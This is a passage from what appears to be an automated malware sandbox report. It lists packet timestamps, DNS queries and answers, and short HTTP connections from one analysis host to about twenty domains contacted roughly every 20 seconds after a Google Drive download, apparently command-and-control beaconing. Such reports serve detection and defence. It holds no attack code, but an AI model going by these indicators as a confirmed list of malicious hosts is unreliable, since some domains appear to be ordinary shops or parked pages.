                                                                                                                                                                                        Jun 10, 2022 07:54:12.125215054 CEST4977680192.168.11.2099.83.175.80
                                                                                                                                                                                        Jun 10, 2022 07:54:12.125277996 CEST4977680192.168.11.2099.83.175.80
                                                                                                                                                                                        Jun 10, 2022 07:54:12.135741949 CEST804977699.83.175.80192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:52.797111034 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:52.807564020 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:52.807816029 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:52.807904005 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:52.818377972 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131586075 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131685019 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131748915 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131809950 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131870031 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131937027 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.131939888 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132034063 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132050991 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132132053 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132137060 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132220030 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132237911 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132308006 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132314920 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132400036 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:53.132508039 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:53.140805006 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.140866041 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.140964985 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:53.141007900 CEST8049779216.58.212.147192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:53.141035080 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:54:53.141239882 CEST4977980192.168.11.20216.58.212.147
                                                                                                                                                                                        Jun 10, 2022 07:55:13.311821938 CEST4978080192.168.11.20198.54.117.211
                                                                                                                                                                                        Jun 10, 2022 07:55:13.473798990 CEST8049780198.54.117.211192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:13.474009991 CEST4978080192.168.11.20198.54.117.211
                                                                                                                                                                                        Jun 10, 2022 07:55:13.474087000 CEST4978080192.168.11.20198.54.117.211
                                                                                                                                                                                        Jun 10, 2022 07:55:13.636204958 CEST8049780198.54.117.211192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:13.636267900 CEST8049780198.54.117.211192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:34.306488991 CEST4978180192.168.11.20154.219.125.79
                                                                                                                                                                                        Jun 10, 2022 07:55:34.508608103 CEST8049781154.219.125.79192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:34.508824110 CEST4978180192.168.11.20154.219.125.79
                                                                                                                                                                                        Jun 10, 2022 07:55:34.508928061 CEST4978180192.168.11.20154.219.125.79
                                                                                                                                                                                        Jun 10, 2022 07:55:34.713819027 CEST8049781154.219.125.79192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:34.713829994 CEST8049781154.219.125.79192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:34.713879108 CEST8049781154.219.125.79192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:34.714127064 CEST4978180192.168.11.20154.219.125.79
                                                                                                                                                                                        Jun 10, 2022 07:55:34.714157104 CEST4978180192.168.11.20154.219.125.79
                                                                                                                                                                                        Jun 10, 2022 07:55:34.916165113 CEST8049781154.219.125.79192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:54.974216938 CEST4978280192.168.11.20185.45.67.192
                                                                                                                                                                                        Jun 10, 2022 07:55:55.014673948 CEST8049782185.45.67.192192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:55.014903069 CEST4978280192.168.11.20185.45.67.192
                                                                                                                                                                                        Jun 10, 2022 07:55:55.014959097 CEST4978280192.168.11.20185.45.67.192
                                                                                                                                                                                        Jun 10, 2022 07:55:55.055623055 CEST8049782185.45.67.192192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:55.078900099 CEST8049782185.45.67.192192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:55.078953981 CEST8049782185.45.67.192192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:55.079297066 CEST4978280192.168.11.20185.45.67.192
                                                                                                                                                                                        Jun 10, 2022 07:55:55.079355001 CEST4978280192.168.11.20185.45.67.192
                                                                                                                                                                                        Jun 10, 2022 07:55:55.120171070 CEST8049782185.45.67.192192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:15.245726109 CEST4978480192.168.11.2046.38.243.234
                                                                                                                                                                                        Jun 10, 2022 07:56:15.261518955 CEST804978446.38.243.234192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:15.261745930 CEST4978480192.168.11.2046.38.243.234
                                                                                                                                                                                        Jun 10, 2022 07:56:15.261794090 CEST4978480192.168.11.2046.38.243.234
                                                                                                                                                                                        Jun 10, 2022 07:56:15.277482986 CEST804978446.38.243.234192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:15.277812004 CEST804978446.38.243.234192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:15.277858973 CEST804978446.38.243.234192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:15.278095007 CEST4978480192.168.11.2046.38.243.234
                                                                                                                                                                                        Jun 10, 2022 07:56:15.278155088 CEST4978480192.168.11.2046.38.243.234
                                                                                                                                                                                        Jun 10, 2022 07:56:15.294385910 CEST804978446.38.243.234192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:35.801225901 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:35.844507933 CEST804978593.89.226.17192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:35.844784021 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:35.844875097 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:36.111924887 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:36.346378088 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:36.424364090 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:37.033499002 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:38.236413956 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:39.439207077 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:40.642115116 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:43.047777891 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:47.859307051 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:56.805012941 CEST4978680192.168.11.208.214.69.48
                                                                                                                                                                                        Jun 10, 2022 07:56:57.135988951 CEST80497868.214.69.48192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:57.136277914 CEST4978680192.168.11.208.214.69.48
                                                                                                                                                                                        Jun 10, 2022 07:56:57.136374950 CEST4978680192.168.11.208.214.69.48
                                                                                                                                                                                        Jun 10, 2022 07:56:57.466548920 CEST4978580192.168.11.2093.89.226.17
                                                                                                                                                                                        Jun 10, 2022 07:56:57.467257023 CEST80497868.214.69.48192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:57.468892097 CEST80497868.214.69.48192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:57.468931913 CEST80497868.214.69.48192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:57.469249964 CEST4978680192.168.11.208.214.69.48
                                                                                                                                                                                        Jun 10, 2022 07:56:57.469305992 CEST4978680192.168.11.208.214.69.48
                                                                                                                                                                                        Jun 10, 2022 07:56:57.800107002 CEST80497868.214.69.48192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:15.861716032 CEST4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        Jun 10, 2022 07:57:15.870779991 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:15.870929956 CEST4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        Jun 10, 2022 07:57:15.871020079 CEST4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        Jun 10, 2022 07:57:15.879955053 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224081039 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224148035 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224195957 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224241972 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224287033 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224334002 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224380016 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224442959 CEST4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224498987 CEST4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224575996 CEST4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        Jun 10, 2022 07:57:16.224978924 CEST4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        Jun 10, 2022 07:57:16.237792015 CEST8049787172.105.250.34192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:16.238038063 CEST4978780192.168.11.20172.105.250.34
                                                                                                                                                                                        Jun 10, 2022 07:57:36.467894077 CEST4978980192.168.11.20152.228.155.71
                                                                                                                                                                                        Jun 10, 2022 07:57:36.488722086 CEST8049789152.228.155.71192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:36.488929033 CEST4978980192.168.11.20152.228.155.71
                                                                                                                                                                                        Jun 10, 2022 07:57:36.488993883 CEST4978980192.168.11.20152.228.155.71
                                                                                                                                                                                        Jun 10, 2022 07:57:36.509871960 CEST8049789152.228.155.71192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:36.509927988 CEST8049789152.228.155.71192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:36.509963989 CEST8049789152.228.155.71192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:36.510309935 CEST4978980192.168.11.20152.228.155.71
                                                                                                                                                                                        Jun 10, 2022 07:57:36.510355949 CEST4978980192.168.11.20152.228.155.71
                                                                                                                                                                                        Jun 10, 2022 07:57:36.531153917 CEST8049789152.228.155.71192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:57.340730906 CEST4979080192.168.11.20116.204.133.148
                                                                                                                                                                                        Jun 10, 2022 07:57:57.610315084 CEST8049790116.204.133.148192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:57.610645056 CEST4979080192.168.11.20116.204.133.148
                                                                                                                                                                                        Jun 10, 2022 07:57:57.610743999 CEST4979080192.168.11.20116.204.133.148
                                                                                                                                                                                        Jun 10, 2022 07:57:57.885705948 CEST8049790116.204.133.148192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:57.885787964 CEST8049790116.204.133.148192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:57.885838985 CEST8049790116.204.133.148192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:57.886127949 CEST4979080192.168.11.20116.204.133.148
                                                                                                                                                                                        Jun 10, 2022 07:57:57.886195898 CEST4979080192.168.11.20116.204.133.148
                                                                                                                                                                                        Jun 10, 2022 07:58:18.557710886 CEST4979280192.168.11.2043.225.157.245
                                                                                                                                                                                        Jun 10, 2022 07:58:18.743916988 CEST804979243.225.157.245192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:18.744086981 CEST4979280192.168.11.2043.225.157.245
                                                                                                                                                                                        Jun 10, 2022 07:58:18.744190931 CEST4979280192.168.11.2043.225.157.245
                                                                                                                                                                                        Jun 10, 2022 07:58:18.930347919 CEST804979243.225.157.245192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:18.930717945 CEST804979243.225.157.245192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:18.930768013 CEST804979243.225.157.245192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:18.931092978 CEST4979280192.168.11.2043.225.157.245
                                                                                                                                                                                        Jun 10, 2022 07:58:18.931144953 CEST4979280192.168.11.2043.225.157.245
                                                                                                                                                                                        Jun 10, 2022 07:58:19.117010117 CEST804979243.225.157.245192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:37.387433052 CEST4979380192.168.11.20176.53.69.151
                                                                                                                                                                                        Jun 10, 2022 07:58:37.425486088 CEST8049793176.53.69.151192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:37.425683975 CEST4979380192.168.11.20176.53.69.151
                                                                                                                                                                                        Jun 10, 2022 07:58:37.425884008 CEST4979380192.168.11.20176.53.69.151
                                                                                                                                                                                        Jun 10, 2022 07:58:37.484652996 CEST8049793176.53.69.151192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:37.484716892 CEST8049793176.53.69.151192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:37.485129118 CEST4979380192.168.11.20176.53.69.151
                                                                                                                                                                                        Jun 10, 2022 07:58:37.485213041 CEST4979380192.168.11.20176.53.69.151
                                                                                                                                                                                        Jun 10, 2022 07:58:37.523005009 CEST8049793176.53.69.151192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:02.576056004 CEST4979480192.168.11.20199.59.243.220
                                                                                                                                                                                        Jun 10, 2022 07:59:02.586448908 CEST8049794199.59.243.220192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:02.586726904 CEST4979480192.168.11.20199.59.243.220
                                                                                                                                                                                        Jun 10, 2022 07:59:02.586786032 CEST4979480192.168.11.20199.59.243.220
                                                                                                                                                                                        Jun 10, 2022 07:59:02.597156048 CEST8049794199.59.243.220192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777235031 CEST8049794199.59.243.220192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777288914 CEST8049794199.59.243.220192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777323961 CEST8049794199.59.243.220192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777358055 CEST8049794199.59.243.220192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777666092 CEST4979480192.168.11.20199.59.243.220
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777715921 CEST4979480192.168.11.20199.59.243.220
                                                                                                                                                                                        Jun 10, 2022 07:59:02.777728081 CEST4979480192.168.11.20199.59.243.220
                                                                                                                                                                                        Jun 10, 2022 07:59:18.945451021 CEST4979680192.168.11.20185.104.28.238
                                                                                                                                                                                        Jun 10, 2022 07:59:18.962923050 CEST8049796185.104.28.238192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:18.963114977 CEST4979680192.168.11.20185.104.28.238
                                                                                                                                                                                        Jun 10, 2022 07:59:18.963219881 CEST4979680192.168.11.20185.104.28.238
                                                                                                                                                                                        Jun 10, 2022 07:59:18.981053114 CEST8049796185.104.28.238192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:18.981102943 CEST8049796185.104.28.238192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:18.981405973 CEST4979680192.168.11.20185.104.28.238
                                                                                                                                                                                        Jun 10, 2022 07:59:18.981492996 CEST4979680192.168.11.20185.104.28.238
                                                                                                                                                                                        Jun 10, 2022 07:59:18.998867989 CEST8049796185.104.28.238192.168.11.20

                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Jun 10, 2022 07:52:16.017062902 CEST5655853192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:52:16.026218891 CEST53565581.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:52:17.136224031 CEST5962553192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:52:17.159879923 CEST53596251.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:53:31.091661930 CEST5292753192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:53:31.110559940 CEST53529271.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:53:51.321137905 CEST5726253192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:53:51.589668989 CEST53572621.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:11.800618887 CEST5271653192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:54:11.965696096 CEST53527161.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:54:52.416529894 CEST4989753192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:54:52.796128988 CEST53498971.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:13.271289110 CEST6542753192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:55:13.310986042 CEST53654271.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:33.782404900 CEST5125253192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:55:34.305494070 CEST53512521.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:55:54.855920076 CEST5234653192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:55:54.973308086 CEST53523461.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:15.226485968 CEST5807753192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:56:15.244992018 CEST53580771.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:35.425230026 CEST5300453192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:56:35.800406933 CEST53530041.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:56:56.498533010 CEST5695353192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:56:56.804173946 CEST53569531.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:15.603730917 CEST6054453192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:57:15.860615015 CEST53605441.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:36.364799023 CEST5258353192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:57:36.466881990 CEST53525831.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:57:56.657160044 CEST6114353192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:57:57.339893103 CEST53611431.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:18.028214931 CEST5805353192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:58:18.556988001 CEST53580531.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:58:37.054825068 CEST4952853192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:58:37.386516094 CEST53495281.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:02.376888990 CEST5895253192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:59:02.575267076 CEST53589521.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:18.889014959 CEST5225153192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:59:18.944551945 CEST53522511.1.1.1192.168.11.20
                                                                                                                                                                                        Jun 10, 2022 07:59:39.119286060 CEST5112153192.168.11.201.1.1.1
                                                                                                                                                                                        Jun 10, 2022 07:59:39.161359072 CEST53511211.1.1.1192.168.11.20

                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                                        Jun 10, 2022 07:52:16.017062902 CEST192.168.11.201.1.1.10xa3caStandard query (0)drive.google.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:52:17.136224031 CEST192.168.11.201.1.1.10x6f6cStandard query (0)doc-14-as-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:53:31.091661930 CEST192.168.11.201.1.1.10xcad1Standard query (0)www.animehub.storeA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:53:51.321137905 CEST192.168.11.201.1.1.10x3dc9Standard query (0)www.somosnuecru.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:54:11.800618887 CEST192.168.11.201.1.1.10x6da4Standard query (0)www.cardviews.netA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:54:52.416529894 CEST192.168.11.201.1.1.10x9c85Standard query (0)www.belajarakuntansipajak.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:13.271289110 CEST192.168.11.201.1.1.10xbec6Standard query (0)www.cocodetteexciple.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:33.782404900 CEST192.168.11.201.1.1.10x885fStandard query (0)www.outletgals.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:54.855920076 CEST192.168.11.201.1.1.10xc472Standard query (0)www.bkbc.siteA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:56:15.226485968 CEST192.168.11.201.1.1.10x612cStandard query (0)www.soussecloud.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:56:35.425230026 CEST192.168.11.201.1.1.10x11baStandard query (0)www.puude.onlineA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:56:56.498533010 CEST192.168.11.201.1.1.10xd2f5Standard query (0)www.rlxijvrd.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:57:15.603730917 CEST192.168.11.201.1.1.10x7959Standard query (0)www.lcm-brokers.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:57:36.364799023 CEST192.168.11.201.1.1.10x75dStandard query (0)www.solaksa.netA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:57:56.657160044 CEST192.168.11.201.1.1.10x40c1Standard query (0)www.hanju2020.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:58:18.028214931 CEST192.168.11.201.1.1.10x8d5bStandard query (0)www.ranabroimpexp.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:58:37.054825068 CEST192.168.11.201.1.1.10x28ddStandard query (0)www.onlinesinavsistemi.xyzA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:59:02.376888990 CEST192.168.11.201.1.1.10xaac5Standard query (0)www.lax0.comA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:59:18.889014959 CEST192.168.11.201.1.1.10xc954Standard query (0)www.tuinkunst.onlineA (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:59:39.119286060 CEST192.168.11.201.1.1.10xe539Standard query (0)www.hellodamia.comA (IP address)IN (0x0001)

                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                        Jun 10, 2022 07:52:16.026218891 CEST1.1.1.1192.168.11.200xa3caNo error (0)drive.google.com142.250.186.110A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:52:17.159879923 CEST1.1.1.1192.168.11.200x6f6cNo error (0)doc-14-as-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:52:17.159879923 CEST1.1.1.1192.168.11.200x6f6cNo error (0)googlehosted.l.googleusercontent.com172.217.19.65A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:53:31.110559940 CEST1.1.1.1192.168.11.200xcad1No error (0)www.animehub.storefedetwotaku.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:53:31.110559940 CEST1.1.1.1192.168.11.200xcad1No error (0)fedetwotaku.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:53:31.110559940 CEST1.1.1.1192.168.11.200xcad1No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:53:51.589668989 CEST1.1.1.1192.168.11.200x3dc9No error (0)www.somosnuecru.com82.98.135.44A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:54:11.965696096 CEST1.1.1.1192.168.11.200x6da4No error (0)www.cardviews.net99.83.175.80A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:54:52.796128988 CEST1.1.1.1192.168.11.200x9c85No error (0)www.belajarakuntansipajak.comghs.google.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:54:52.796128988 CEST1.1.1.1192.168.11.200x9c85No error (0)ghs.google.com216.58.212.147A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:13.310986042 CEST1.1.1.1192.168.11.200xbec6No error (0)www.cocodetteexciple.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:13.310986042 CEST1.1.1.1192.168.11.200xbec6No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:13.310986042 CEST1.1.1.1192.168.11.200xbec6No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:13.310986042 CEST1.1.1.1192.168.11.200xbec6No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:13.310986042 CEST1.1.1.1192.168.11.200xbec6No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:13.310986042 CEST1.1.1.1192.168.11.200xbec6No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:13.310986042 CEST1.1.1.1192.168.11.200xbec6No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:13.310986042 CEST1.1.1.1192.168.11.200xbec6No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:34.305494070 CEST1.1.1.1192.168.11.200x885fNo error (0)www.outletgals.com154.219.125.79A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:54.973308086 CEST1.1.1.1192.168.11.200xc472No error (0)www.bkbc.sitebkbc.siteCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:55:54.973308086 CEST1.1.1.1192.168.11.200xc472No error (0)bkbc.site185.45.67.192A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:56:15.244992018 CEST1.1.1.1192.168.11.200x612cNo error (0)www.soussecloud.com46.38.243.234A (IP address)IN (0x0001)
                                                                                                                                                                                        Jun 10, 2022 07:56:35.800406933 CEST1.1.1.1192.168.11.200x11baNo error (0)www.puude.onlinepuude.onlineCNAME (Canonical name)IN (0x0001)
